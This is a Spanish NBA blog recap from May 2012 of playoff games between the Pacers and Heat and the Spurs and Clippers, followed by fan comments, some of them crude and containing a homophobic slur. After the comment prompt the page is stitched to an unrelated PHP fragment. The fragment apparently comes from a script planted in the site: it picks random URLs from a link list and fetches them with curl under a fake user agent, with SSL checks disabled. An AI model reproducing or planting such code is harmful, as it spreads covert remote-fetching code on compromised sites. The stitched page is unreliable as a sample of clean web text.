La Crónica: Por su propio peso

18 de May de 2012 por TheDeerHunter

Mario Chalmers, Dwyane Wade, Shane Battier, LeBron James, Dexter Pittman. Es el quinteto titular que desplegaba ayer Spoelstra. Enfrente, David West y Roy Hibbert afilaban los cuchillos. A la conclusión serían 16 rebotes de diferencia y únicamente 8 puntos al contraataque de Miami. Wade naufragaba, Hibbert emulaba a Dwight Howard y sus compañeros aprovechaban el destrozo para acribillar a triples, cómodamente abiertos (75-94).

La frustación estalló en una de las broncas más bochornosas que hayamos presenciado de un jugador a su técnico. Wade anoche perdía los papeles en una actitud que difícilmente beneficiará a los suyos. Podemos entender su malestar pero la concentración de talento tiene sus pros y sus contras. El pescado está vendido en esta serie y sólo Indiana puede perderla.

Anoche hubo pocas fisuras en los Pacers. Quizás habría sido deseable una mejor actuación de la segunda unidad pero tampoco hizo falta. Brilló Hibbert por encima de todos pero el resto de titulares cumplieron muy bien. Por los Heat el mejor fue Chalmers…

En San Antonio, otro bañito (88-105). Lecciones de Popovich a Del Negro, de maestro a alumno, y también de Parker a Paul dentro del parqué. Buena lección de humildad que se van a llevar tanto CP3 como Griffin. Harán bien de asimilar todo esto en vena.

Los Clippers no pudieron hacer nada. Sólo el banco pudo aportar con cierta eficacia, pero el de los Spurs no es el de Grizzlies. Además de la master class impartida por Parker y Duncan, sólida aportación de casi todos los secundarios: Diaw, Green, Leonard, Splitter, Neal… y eso que Ginóbili y Jackson estuvieron tapaditos o que Blair apenas cuenta algún minuto. Menuda artillería.

PREMIOS

MVP: Roy Hibbert destrozó a los Heat en la pintura al anotar 19 puntos y capturar 18 rebotes. El día de su trigésimo cumpleaños, Tony Parker lideró a los Spurs a otra fácil victoria con 22 puntos, 5 rebotes, 5 asistencias y 3 robos.

Rookie: No fue el mejor partido de Kawhi Leonard pero aun así se fue para casa con 5 puntos, 6 rebotes y un par de robos.

Sorpresa: Boris Diaw demuestra lo importante que es jugar en un equipo que tiene las cosas claras y que se encuentra en dinámica ganadora. Su aportación siempre es muy importante pero anoche se salió al anotar sus 7 lanzamientos de canasta para acabar el partido con 16 puntos, 4 rebotes y 4 asistencias.

Decepción: Horripilante partido de Dwyane Wade, que además tuvo la jeta de encararse con su entrenador en pleno partido. 2 de 13 en tiros de campo, 5 puntos y 5 pérdidas. Prácticamente restó más que sumó. Su compañero Shane Battier no estuvo mucho mejor: 0 de 7 y la sensación de que ya no está para estos trotes. En San Antonio, Chris Paul acabó el partido con 10 puntos y 8 pérdidas y Blake Griffin solo fue capaz de coger 1 rebote. No han llegado a esta ronda en la mejor de sus condiciones físicas.

Esfuerzo en vano: Esta vez no fue LeBron James la punta de lanza de los Heat sino Mario Chalmers. Aprovechó a la perfección la supervigilancia sobre sus compañeros para anotar 25 puntos (10 de 15 en tiros de campo), coger 6 rebotes y repartir 5 asistencias. En los Clippers no podemos salvar a nadie.

Imágenes | AP Photos / Getty Images

Comenta

35 comentarios a esta entrada

  1. txusma dice:
    #1

    Sancho88:
    Lo cual, para finalizar, deja a Thibodeau, pero sobre todo a Spoelstra, con los colores subidos cuanto menos, sobre todo al filipino. Si no eres capaz de meterle más de 80 puntos a un equipo como Pacers en dos juegos consecutivos, que defienden bien pero tampoco son los ‘Bad boys’… pues olvídate del anillo. Yo si fuera Lebron estaría cabreadísimo con el señor que se sienta en ese banquillo… es muy triste.

    Cito aquí un mensaje de Sancho en la anterior crónica.

    Yo si fuera Lebron estaría cabreadísimo con el 2 de 13 de Wade, el 0 de 7 de Battier y la inexistencia de juego interior. Fijaos en la plantilla que presenta anoche Miami y pensad que Wade restó más que sumó. Creéis que ese equipo puede ganar algún partido de Playoffs? Ni con el mejor entrenador del mundo. Los Heat son Lebron, Wade (aunq este año creo que más Lebron y mucho menos Wade) y 10 tios más que la mayoría no valdrían ni para retales de otros equipos (Miller, Battier, Anthony, Turiaf…). Con el Big Three sano y a pleno rendimiento son un equipo temible pero en cuanto le empiezas a exigir a los secundarios la cosa “cae por su propio peso” como titula la crónica. No me convencerás que principalmente la culpa es de Spoelstra.

    Y bueno, recordar que prácticamente sin Rose, los Bulls han ganado la regular gracias sobretodo a su defensa de la que la principal culpa es de Thibodeau. Després en Playoffs si se te lesiona tu mejor anotador (Rose) y tu mejor defensor (Noah), que quieres hacer? Deberíamos atizar un poco más a Deng y Boozer que aparecieron cuando ya la serie iba cuesta abajo.

      Citar

  2. simon dice:
    #2

    Yo no dejo de fliparlo con Popovic, si a principio de temporada me dicen que el mejor equipo de la competición tienen en su quinteto titular a Danny Green, Kawi Leonard y el obeso Boris Diaw me parto de risa…
    Mucha cara la de Wade ayer… increible, creo que si pierden contra Pacers deben renunciar a uno de los 3 para intercambiarlo por un par de piezas que puedan distribuir un poco mas el talento de la plantilla. Yo creo que deberian desprenderse de Wade, pero es lo que veo mas complicado, por todo el tiempo que lleva y tal, pero por Bosh no creo que saquen todo lo que necesitan y Lebron es el mejor del mundo junto con Durant, asi que para mi el sacrificado deberia ser Wade, que aun con buenos numeros ambos se solapan bastante James y el. Mejor que con el dinero de Wade se traigan un escolta tirador + un pivot + un jugador de banquillo que aporte de verdad.
    Por cierto, habeis puesto los videos cambiados.

      Citar

  3. txusma dice:
    #3

    simon:

    Por cierto, habeis puesto los videos cambiados.

    Cambiados? El primero es el de los Pacers y el segundo el de los Spurs, no?

      Citar

  4. simon dice:
    #4

    txusma: Cambiados? El primero es el de los Pacers y el segundo el de los Spurs, no?

    Ahh pues si… jjajaja no se como lo he mirao… I´m sorry!

      Citar

  5. Viva_Dirk dice:
    #5

    Estoy con Txus en el tema de los Heat, Spoelstra los ha llevado ha defender extremadamente bien, algo que el primer año les llevó a una final que perdieron contra un equipo parecido a los actuales Pacers, con mas rebote, mejor circulación de balón y mejores tiradores.

    Cuando juntaron al Big Three se centraron en buscar tiradores(Miller, Battier, James Jones) y es claramente un concepto equivocado, para que Lebron y Wade no se estorben es vital controlar el rebote para poder correr, algo que cuando llegan los play-offs es mucho mas dificil puesto que los mejores juegos interiores estan ahí. Desde luego si caen frente a Indiana habrá lio en Miami, pero hay que tener huevos para saber que la solución es traspasar a Wade o a Lebron.

      Citar

  6. GreenPride dice:
    #6

    Socavón en Miami y se veía venir… Con Bosh lesionado el agujero interior de los Heat es enorme y solo una actuación fenomenal conjunta de LeBron y Wade podría salvarles… pero si Wade hace 5 puntitos y 5 pérdidas pues apaga y vamonos. Al descanso habían sobrevivido gracias a un Chalmers que aprovechaba la nula defensa del Pick&Roll de Hibbert y al esfuerzo de LeBron. Pero en cuanto el cansancio hizo mella en LeBron todo se vino abajo rápidamente. Machacados por dentro por Hibbert y en menor medida West y perdiendo rebotes a porrillo paso lo que tenía que pasar que los exteriores empezaron a verse abiertos y a meter triples (Granger, George, Collison, Hill). Futuro muy negro para los super-favoritos Heat . LeBron no puede sólo hacer de todo contra un equipo como los Pacers muy bien armado y ahora mismo le necesitan anotando, pegándose a muerte en defensa con el 4 rival y reboteando como una bestia y claro a nivel PO eso puede salir un partido pero todos es imposible. Si además tus secundarios exteriores no meten un triple ni en una piscina pues tu ataque se acaba colapsando más pronto que tarde si no tienes la ayuda de Flash.
    No estoy de acuerdo en que sólo los Pacers pueden perder, aunque sí en que tienen las cartas para llevarse la eliminatoria y dar la sorpresa si Bosh no regresa a tiempo. En el 4º los Heat volverán a necesitar una actuación fenomenal de LeBron y Wade a la vez y algo más del resto si quieren tener opciones. Eso e intentar como sea cerrar entre todos el rebote para que no sea la sangría que está siendo bajo el aro. Difícil lo tienen pero con dos jugadores como Wade y Bron todo es posible.
    Aquí quiero comentar que la actitud de Wade es un cabreo por frustracióny que aunque evidentemente no debería hacerlo esas cosas pasan. Lo que sí es preocupante es su no-evolución como jugador. En sus primeros años en la liga era un jugador explosivo que cogía rachas de lanzamiento (incluso de 3). Como muestra aquellas finales ganadas a los Mavs donde jugo estilo Jordan (sí sí, fue una exhibición impresionante). Ahora parece haber olvidado cómo se juega a más de 3 metros del aro, sólo algún lanzamiento a tablero pero su tiro de media-larga distancia es inexistente lo que le lastra muchísimo y le provoca porcentajes horribles cuando no puede explotar su físico. Los jugadores deben siempre evolucionar y en este caso parece que el bueno de Wade (que me encantaba en sus inicios y por lo que podía llegar a ser) puede quedarse en un jugador bueno pero sin más.
    En cuanto al Spurs-Clippers insultante superioridad de los texanos. Yo creía que habría más eliminatoria pero de momento los de LA se ven impotentes para seguir el ritmo de los del Alamo. Por cierto, ¿Estáis seguros de que estamos en 2012 o estoy viviendo un deja vu? Unos PO con Duncan y Garnett como MVPs y sus dos equipos jugando bien, parece que es de otra época. La verdad es que es increíble como Popovich coge jugadores supuestamente conflictivos o fuera de forma pero que saben jugar (Stephen Jackson, Boris Diaw) y les pone a jugar como los ángeles. Igualmente increíble como saca partido de jugadores que en otros equipos no hacen nada o rookies sin experiencia (Danny Green, Leonard, Neal). Y por si fuera poco su Big 3 parece sano y plena forma con Duncan dando lecciones a un muy verde Griffin, Manudo haciendo de las suyas y Parker dominando a CP3. Los Clippers necesitan bajar mucho el ritmo de los partidos y conseguir parar la sangría de puntos o la serie acabará rápido. Para ellos fundamental que CP3 pudiera controlar el ritmo y tratar de evitar ese passing-game que tan bien realizan los Spurs. Una gozada verles jugar la verdad.

      Citar

  7. Sancho88 dice:
    #7

    Yo me sigo reiterando en mis críticas a tipos como Spoelstra o Mike Brown. A ver, pienso que esto no deja de ser un juego en equipo, y ya sé que me pongo machacón y pesado con esta circunstancia. En defensa, como bien decís, Spoelstra tiene bastante bien trabajado el equipo, hay bastantes ayudas, se buscan 2 contra 1, en ocasiones se defiende muy bien la línea de pase rival… pero en ataque? En ataque es una risa. Yo veo la orquesta de Indiana y Spurs, y a priori se me ocurren varias cosas que comentar en comparación con los Heat. Pacers no tienen tanta calidad tampoco, y en otras condiciones igual diríamos que Hansbrough, Paul George, Hill y demás no tienen nivel. Si no atacasen como atacan, estos tíos ni la olían. Hill de base tampoco es la quinta esencia, y sin embargo, coño, mira como atacan los amarillos. Pero en cambio, todos ellos se implican, porque hay un sentido de juego ofensivo. Y eso falla categóricamente en los Heat. En los Heat la cosa es guerra de trincheras y cada uno que se la haga por su lado, algo que ocurre inexplicablemente también en los Lakers con el señor Bryant cortocircuitos a su servicio, y me parece vergonzoso que los seguidores Lakers solo tengáis ira en el cuerpo contra Pau, pero poco se os ha visto criticar al jefeficto… en fin, sé que es una guerra perdida y que a Bryant le justificáis todo. A Bryant sí, pero a Wade no, por ejemplo…

    Bueno, lo único que yo quería decir, es que da igual que tus tipos se llamen Joel Anthony, Ronny Turiaf, Mike MIller, Norris Cole, etc. etc. SI juegas un baloncesto colectivo, intentando aunar esfuerzos, intentando que la pelota circule en el ataque, seguramente Wade no tenga que tirarse tiros inverosímiles, que son canastas siempre tan difíciiles de conseguir que como sucedió ayer, muchas veces las falla, o no veríamos siempre a Lebron contra el mundo para conseguir dos puntos. Seguramente algunos pases para conseguir a Anthony con 10 puntitos como ayer (no es tan nulo porque tiene aceptable tiro a canasta y lectura del poste bajo, pero nunca suele pasar de dos tiros a canasta), a Miller con otros 10-12 o a Battier, que en días inspirados puede llegar a 15, llegarían, pero les tienes que dar un rol en ataque, que en estos momentos es de papanatas. ¿Cómo pueden implicarse en estas condiciones? Imposible. No tienen rol. Para el rival es facilísimo defender a dos tipos, pero imposible defenderles a esos dos si el resto se implica, y para eso el entrenador ha de implicarles. La química de equipo no se consigue por ciencia infusa, sino que requiere muchísimo trabajo, y Spoelstra no ha sabido en dos años ni siquiera conseguir cierta química. Los partidos de los Heat se resuelven siempre por aplastamiento estadístico de sus cracks. Matar a Wade como habéis aprovechado para hacer hoy me parece cobarde, cuando habría que ver qué puede hacer su entrenador para que Wade tenga mejores situaciones de tiro.

    Puede ser que como jugadores individuales no tienen demasiado talento, o nulo talento, me da igual, pero yo lo dije en el primer análisis de temporada. Si Miami no puede elaborar jugadas, no puede mover la pelota, buscar mil variantes en ataque… entonces quién puede? Chalmers, Wade y Lebron, tres bases en el campo, y la pelota no se mueve… No creo que la culpa sea directamente de que son egoístas, sino de que no se entrena prácticamente nada en la ofensiva.

    Ahí hay algo más que un día no inspirado de Wade… solo digo que hay equipos más trabajados y que da gusto verles, como Indiana y San Antonio, o incluso los propios Celtics, que dan clases de sistemas básicos ofensvios que puedes poner en los colegios para niños que empiezan a jugar a este deporte, pero ves a otros como Heat y Lakers y piensas que algo ha fracasado ahí. Nada más que añadir

      Citar

  8. Esteban dice:
    #8

    El heat se mofo de los knicks a quienes en algun partido le faltaron 5 jugadores
    Todo hablaron de lo bueno q era james y lo malo q era melo

    Bueno, ahora vemos q las lesiones calan ondo en los equipos y el heat lo esta sufriendo

    No hay q escupir para arriba

    Sobre spurs y clippers, parece q solo el thunder puede hacerle alguna sombra a la larga y equilibrada plantilla texanas, lo tienen todo, jovenes, experiencia y 11 jugadores con posibilidades de jugar

    De hecho tener a ginoboli, neal, jackson, tiago y blair, mas bonner y anderson seria in equipp por si mismo para pelear un lugar en PO, demasiado para unos extenuados y lesionados clippers

    Los clippers ya hicieron lo suyo, eliminaron a un mejor clasificado q ellos de. Visitante, suficiente, no les da el cuero para mas q eso en el oeste, en el este quiza se fueran hasta la final de la NBA, pero la diferencia entre conferencias es un abismo

    El futuro puede sonreirle a clippers

      Citar

  9. txusma dice:
    #9

    Vete a saber si Spoelstra intento poner un poco de orden en ataque y Wade lo envió a tomar viento!

      Citar

  10. TheDeerHunter dice:
    #10

    No entiendo lo de “cobarde”, Sancho… para mí cobarde es Wade por maltratar públicamente a su técnico exclusivamente por su condición de estrella. Me gustaría verle hablarle así a Tito Phil, a Popovic o a Doc Rivers.
    Diría que Spoelstra no se merece eso y no estoy tan de acuerdo con que no encuentra soluciones.
    Si el tiro de Wade es sólo a tres metros del aro es difícil plantear soluciones tácticas para que el rival no se cierre.

    Peor decepción que yo me llevé el otro día con Pau me la he llevado hoy con Wade, aunque en no es el mismo caso porque Wade cada día que pasa va oliendo más a ojete y a Pau le he admirado siempre.
    En aquella final que ganó parecía el Jordan joven… pero mientras aquel aprendió exponencialmente éste se ha quedado en una versión jiñada de si mismo.

    En mi opinión los grandes jugadores no se pueden permitir nunca un espanto así, y a los que les ocurre o bien es por un motivo de peso (léase problemas físicos) o bien es porque no son tan grandes como creíamos.

      Citar

  11. HisRoyalAirness dice:
    #11

    Bueno, yo creo que el Big-Three está mal concebido desde un inicio. Si tienes a 2 jugadores exteriores como Wade y Lebron por qué no te traes a un interior potente? Porque Bosh es lo opuesto a ese concepto.

    Y no me gusta nada el rollo que os treis con Wade; traspasarle? Por favor, ha estado lesionado media temporada…acaso os olvidais de las Finales del año pasado?

      Citar

  12. Sancho88 dice:
    #12

    Si yo tampoco estoy justificándole, y me parece una falta de respeto, aunque hay que estar en la pista o saber exactamente qué se dijeron. Por bajar al terreno de los humanos, en el Palencia Baloncesto juega Adrian Moss, que formó parte de aquellos Gators con Noah, Horford, Brewer, etc. Bueno, ese un día le agarró a Lezkano de la pechera en medio del partido tras cometer una técnica. Se le fue la olla, de acuerdo, pero fue consecuencia de un calentón en medio de un partido, de una frustración contra sí mismo, y cuando salimos de la ruedad de prensa el tipo le estaba pidiendo perdón en el pasillo… por eso digo que no podemos saber cual era la causa real del enfado, qué se dijeron exactamente… si alguien lo sabe que lo cuente. Yo voy a intentar eguir por las webs a ver qué se está diciendo sobre esto.

    Hasta ahí perfecto, incluso desde el club si es una actitud reiterativa o le ha insultado o alguna movida por el estilo, merece castigo. Pero yo lo que critico de verdad es que no veo a Spoelstra como un genio, como un maestro para guiar a un equipo como este. Creo que se le queda grande. Y no es nuevo, el año pasado si os acordáis, fue un debate muy latente en la página, porque no veíamos absolutamente nada en ataque. En serio, no os parece que es un pésimo estratega?

      Citar

  13. simon dice:
    #13

    Pues para mi el problema de Heat no es ni mucho menos el entrenador, tiene 3 piezas muy buenas pero 2 de ellas casi calcadas, y encima a Wade esta temporada está con buenos numeros pero yo no lo he terminado de ver comodo en su papel de clarisimo segundon. ( tambien puede ser por las lesiones )… El problema es que tienes un 4 con alergia a pegarse por dentro, un pivot que no es un gran reboteador ni un gran defensor de poste bajo, y un base, que bueno CHalmers con jugadores del tipo Lebron o Wade te puede valer como base. el problema de Heat viene de la configuracion de la plantilla, para mi sobra un exterior y falta un interno mas y un tirador fiable de verdad. Si ganan la NBA este año será pq en el Este no han tenido rival ( con bosh no veo a Indiana ganando mas de dos partidos en una serie ) y por el hecho de que Spurs llegara extenuado a la final debido a una dura final de conferencia o a unos thunder a los que podria faltarle un puntito de experiencia, pero ni mucho menos veo a estos Heat haciendo una dinastica con la plantilla actual, cambiando a una superestrella ( wade ) por un pivot reboteador ( de verdad ) + un escolta tirador de calidad de verdad, por ejemplo ( esto es algo inverosimil ) Wade + Bosh por Bogut, Lee y Klay. se te quedaria un equipo con Chalmers, Klay, Lebron, Lee, Bogut. + Cole, Miller, Battier, Turiaf + Anthony. + un posible fichaje de Nash el año que viene para dirigir el cotarro te queda un equipo de flipar. + seguro que algun veterano con ganas de anillo + pillas por ahi. Eso y pides consejo a Popovic para draftear algo valido al final de la primera ronda y arrasas jajaaj
    PD: me encantan las pajas mentales 😀 😀

      Citar

  14. Esteban dice:
    #14

    HisRoyalAirness:
    Bueno, yo creo que el Big-Three está mal concebido desde un inicio. Si tienes a 2 jugadores exteriores como Wade y Lebron por qué no te traes a un interior potente? Porque Bosh es lo opuesto a ese concepto.

    Y no me gusta nada el rollo que os treis con Wade; traspasarle? Por favor, ha estado lesionado media temporada…acaso os olvidais de las Finales del año pasado?

    coincido, bosh es casi tan alero como lebron, yo tambien hubiese buscado un INTERNO pero verdaderamente INTERNO, howard quiza? cobraria lo mismo que bosh, fue un apuro monumental su fichaje a mi parecer, y mas por ese pastizal, si no es howard, el mismo pau, kaman + landry, o jugadores de ese estilo

    creo que se cegaron por sus 24ppp en toronto,

      Citar

  15. Txusma dice:
    #15

    Según todo el mundo Wade le dice a Spoelstra “Sal de mi vista” o similar, con algunas ‘fuck’ de por medio. Lo que no se sabe es que le dijo Spoelstra. En twitter alguien comenta que algo así como “Estás jugando como el culo”. No sé si creérmelo. Si fuera cierto es para coger a Spoelstra y colgarlo de los pulgares. Por mal que lo esté haciendo un jugador no creo que sea manera de hablarle.
    En todo caso, q hubierais hecho tras este incidente? Hubierais sentado a Wade teniendo en cuenta que estaba totalmente fuera del partido, presa de los nervios?
    Tb se comenta que Wade anda tocado (como casi toda la temporada) así que no habrá q tenérselo en cuenta.

      Citar

  16. Sancho88 dice:
    #16

    Hombre, pues si no eres capaz de lidiar con estrellas en la NBA, no te metas a ser entrenador de la NBA… muy poca personalidad por su parte. Cuando ocurren estas cosas de estrellas despreciando a su entrenador, es que ese entrenador lleva mucho tiempo demostrando su incompetencia. Como bien decís, Wade jamás le habría dicho eso a Popo, Jackson o Rivers… imposible… De ahí que yo critique tanto a Howard o a Deron, porque a mi juicio, se metieron con dos señores entrenadores que sabían y saben muy bien en qué trabajan y creo que lo hacen muy bien (Sloan lo hacía)… pero de Spoelstra yo opino que es una cagada de entrenador.

    Por otra parte, este finde va a ser el más importante de la temporada a mi juicio. La pasada semana cayeron Bulls y Grizzlies contra todo pronóstico, y esta semana les pueden acompañar Lakers y Heat. Veremos qué pasa, pero cuanto menos estamos ante un finde muy divertido que va a marcar la sintonía de lo que pase de aquí al final.

      Citar

  17. Txusma dice:
    #17

    Es decir, que como Spoelstra te cae mal te parece bien que se encaren con él y le insulten? Y eso con Sloan no se podía hacer, claro, pq es todo un señor. No sé, no acabo de entenderlo. Tan capullos me parecen Wade como Williams, en este caso.

      Citar

  18. Sancho88 dice:
    #18

    No me cae mal, pero estoy diciendo que cosas así se ven venir con entrenadores que no dan el nivel, que al final los jugadores acaban mofándose de él, despreciándolo o no haciéndole ni caso. Isiah Thomas, por ejemplo. El respeto se gana, no está en el carné de identidad implícito

      Citar

  19. Sancho88 dice:
    #19

    Es decir, partiendo de la base de que los jugadores suelen ser caprichosos, suelen quejarse porque no juegan todos los minutos que quieren, o se tiran todos los tiros que quieren, etc. etc., y además su nivel de educación deja mucho que desear en muchos casos, porque tampoco tienen una formación adecuada en lo personal y el dinero les convierte en reyes midas de decir y hacer lo que les salga de la punta, creo que un entrenador tiene que saber ganarse su confianza y saber lidiar con ellos. No todos lo ponen fácil, y desde luego si tienes a una estrella en contra debes replantearte qué has hecho mal, porque evidentemente esa bronca no habría ocurrido si el equipo tuviera una argamasa construida en los últimos dos años. No sé, yo veo peligro de fuga en esa presa por falta de una buena construcción, y ojo, tampoco puedo asegurar que la planificación sea culpa de Spoelstra en sí, porque Riley tendrá su responsabilidad en todo esto (Bosh cagada, Beasley a mi juicio también cagada por su escaso contrato, Mike MIller cagadón al cubo), pero sí que en la configuración del juego del equipo, creo que la responsabiliad mayor de que jueguen mejor o peor debe partir del entrenador.

    Y no es que me caiga mal Spoelstra, pero considero que no ha demostrado prácticamente nada desde que llegó, porque su equipo juega de manera muy plana con recursos individuales que sí podrían hacerles jugar mejor a mi juicio, y que no sé como le han dado el puesto de una nave tan complicada. Pero dicho esto, tampoco exculpo de responsabilidad al propio Wade, porque lo que uno no puede hacer es marcarse un partido horrible y echarle la culpa al entrenador.

    Pero qué fue primero, la gallina o el huevo? Por qué los Heat dependen tanto de sus cracks, por la configuración de la plantilla o por una mala administración del juego, una mala preparación de la lectura de las defensas rivales? Pueden ser las dos cosas, todo influye, pero si dependes exclusivamente de tus estrellas, eso quiere decir que has fracasado como entrenador porque no has sido capaz de implicar al resto ni de preparar nada más para días así…

      Citar

  20. Sancho88 dice:
    #20

    Osea, lo de Beasley cagada digo porque 5 kilos por las posibilidades que te podía dar… estaba basante bien. Es decir, no se los pagas a un señor que puede dar mucho de sí, y sí a Miller, que ya está acabado… no me cuadra

      Citar

  21. nba dice:
    #21

    Deer, a ver si conseguis montar algo que se llame algo asi como “el rincon de Sancho”, que se le ve con ganas de debatir/opinar/aportar al chaval , y creo que con los comentarios se queda un poco corto.
    Respecto a la validez de los entrenadores que intentan manejar estrellas, sin mucha experiencia, supongo que dependerá de las facilidades que les den las estrellas a estos.
    Porque pongamonos en el caso de que Durantula le da por ponerse borde, probablemente Brooks acabaria de patitas en la calle.
    Lo bueno de estos playoffs es que las lesiones estan haciendo saltar por los aires todas las previsiones, veremos si tanto Sixers como Pacers , son capaces de asumir los momentos dificiles que llegaran.
    Aupa Lakers

      Citar

  22. Nacho dice:
    #22

    Apoyo la moción de “The Sancho’s Corner”, eso sí, con una limitación, sus comentarios a sus columnas no deberían pasar de tres líneas. Y no más de dos seguidos. ¿Podría? o ¿le vendría el síndrome Spoesltra? Es decir, soltar a sus lobos en ataque sin conmiseración a los mantas que jugamos a su alrededor, jeje (me río yo de mi propio chiste, porque es muy malo)
    En el caso del de Miami, entiendo a Sancho, pero

    Sancho88:
    Hombre, pues si no eres capaz de lidiar con estrellas en la NBA, no te metas a ser entrenador de la NBA… muy poca personalidad por su parte. Cuando ocurren estas cosas de estrellas despreciando a su entrenador, es que ese entrenador lleva mucho tiempo demostrando su incompetencia.

    Sobre esto, niego la mayor. Más bien diría que la proposición sería la contraria: “Si eres estrella de la NBA y no sabes lidiar con los entrenadores, no te metas a estrella…”
    Normalmente, alguien que lleve la chapita de estrella, no hace ese juego, no de esa manera, y se mete con un entrenador se llame Vogel, Spoelstra, o Popovich. Y se metería con respeto, porque es una persona con respeto. La medida está en si Wade hubiera hecho lo mismo si ante una decisión igual, y una temporada igual, el que estuviese sentado en el banquillo se llamara Pat Riley. Y es obvio que la respuesta es NO. Si la cara de la moneda hubiese caído en un Bosh sano, Miami podría haberse llevado el anillo. Y quizás en diez años, el señor de Miami hubiese sido el coach referencia. Y el próximo niñato no le tosería.
    Creo que es un entrenador válido, ha creado una muy buena defensa, y ha dejado el ataque en manos de lo que le pedían. Supongo que año a año podría manejar más cosas. La temporada pasada seguí la NBA gracias a vosotros, pues desde enero no pude ver nada, pero creo que este año tiene peor equipo y ha jugado mejor, no sé ya me diréis, y si mis sensaciones son buenas, algo de mérito tiene el chaval. Creo que los males del equipo vienen de arriba, y si pierden contra los Pacers me harán feliz.

    P.D. Me aventuro a dar un tema a Sancho para su sección. Wade va a París, y a media noche sube a un coche, y se encuentra en el vestuario de los Celtics de los 80…

      Citar

  23. Sancho88 dice:
    #23

    En ese caso debería piyarse el condensador de fluzo de Doc y volver al futuro no? jejej. Me veo a Larry tipo carcelero de Sleepers sodomizando y acallando a leñazos la boca chancla de Wade para que saliera más corderito a jugar.

    En el fondo es lo que estamos diciendo, que si fuera el abuelo Riley no tendría pelotas, y que en un vestuario de tantos egos es necesario tener a un señor que parezca un señor, no que parezca un tripulante de Vacaciones en el Mar…

      Citar

  24. Txusma dice:
    #24

    El publico pide un “Sancho’s Corner”!! Si se anima le hago un mini banner para poner debajo del de “Reflexiones sobre la bocina” de Magic. La pelota está en su tejado.

      Citar

  25. Sancho88 dice:
    #25

    Joder, por aclamación popular no me puedo negar, la verdad. Pero yo soy yo para lo bueno y para lo malo, luego no os andéis quejando de mariconadas. Adelante con el ban

      Citar

  26. Esteban dice:
    #26

    hoy partido en LA!!!

    los lakers por la redencion ante su publico!!

    go lakers!! de lo que van de los PO las unicas series interesantes fueron clippers y lakers en la primera ronda,

    dos barridas mas y seran unos PO del oeste muy aburridos

      Citar

  27. Sancho88 dice:
    #27

    Preparaos para una barbaridad de Bryant esta noche. No espero menos de 40 tantos. He dicho

      Citar

  28. Esteban dice:
    #28

    Sancho88:
    Preparaos para una barbaridad de Bryant esta noche. No espero menos de 40 tantos. He dicho

    yo creo lo mismooooo

      Citar

  29. HisRoyalAirness dice:
    #29

    Yo creo qu si Kobe mete 40 los Lakers pierden, porque eso quiere decir que se habrá tirado cerca de 30 tiros

      Citar

  30. Inad23 dice:
    #30

    Viendo el box score pienso que vaya verguenza de Lakers,Kobe se ha tirado 25 tiros y ha metido poco mas de un tercio,y luego tenemos a Bynum que solo ha metido 2 tiros y luego Pau que le han dejado tirar 8 tiros,metiendo la mitad de ellos…Es vedad que ha hecho 6 asistencias…Pero,aquellos que han visto el partido…¿Ha sido tan “descarado” el poco protagonismo de Pau? Hasta Metta ha tirado mas que el…:-/

      Citar

  31. simon dice:
    #31

    No emitire ninguna opinion hasta ver el partido o ver un buen resumen del partido pero a priori la diferencia de FT me parece brutal.

      Citar

  32. nba dice:
    #32

    Por si alguien dudaba de la diferencia de FT, se jugaba en el Staples, con lo que creo que queda todo dicho.
    Interesante link sobre “The Big Fundamental”
    http://foros.acb.com/viewtopic.php?f=1&t=454834

      Citar

  33. Nacho dice:
    #33

    Acabo de ver el partido. La diferencia de FT no es tan brutal. Y el arbitraje por momentos ha sido visitante, aunque al final se ha equilibrado. Pero ni mucho menos caserón.
    En cuanto a lo de Pau, algo de culpa tiene él y ese maldito antiegoísmo que tiene. Pero vamos los LAL se lo tendrían que mirar. Mejor dicho, el imbécil que se sienta en el banquillo, aunque hoy no ha jodido a su equipo.

      Citar

  34. TheDeerHunter dice:
    #34

    ¿queda todo dicho?
    En la retransmisión en directo sacaron un vídeo más o menos de un par de minutos de slow motion de canastas de Kobe todas con falta del defensor que no se pitaron (y aún así las metió) Seguramente estará por el youtube si alguien tiene interés.
    El hecho de que ayer Perkins terminara el partido es algo absolutamente milagroso e incomprensible. Entre faltas no pitadas y bloqueos en movimiento pudo hacer fácilmente 30 faltas en total. Vaya máquina

      Citar

  35. Sancho88 dice:
    #35

    Mi tato lo ha visto en directo y cuando me he levantado me ha dicho que ha sido una vergüenza el arbitraje, un choriceo en toda regla… Yo lo voy a ver ahora, me alegro muchísimo de la victoria de Lakers y cuando me levanté estaba tirando Bryant los dos últimos tiros libres, y luego cuando ganaban de 3 recuerdo haber dicho algo como… haced falta hijos de puta, pero no recuerdo bien…

    A ver esta noche, ojalá ganen los Lakers…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>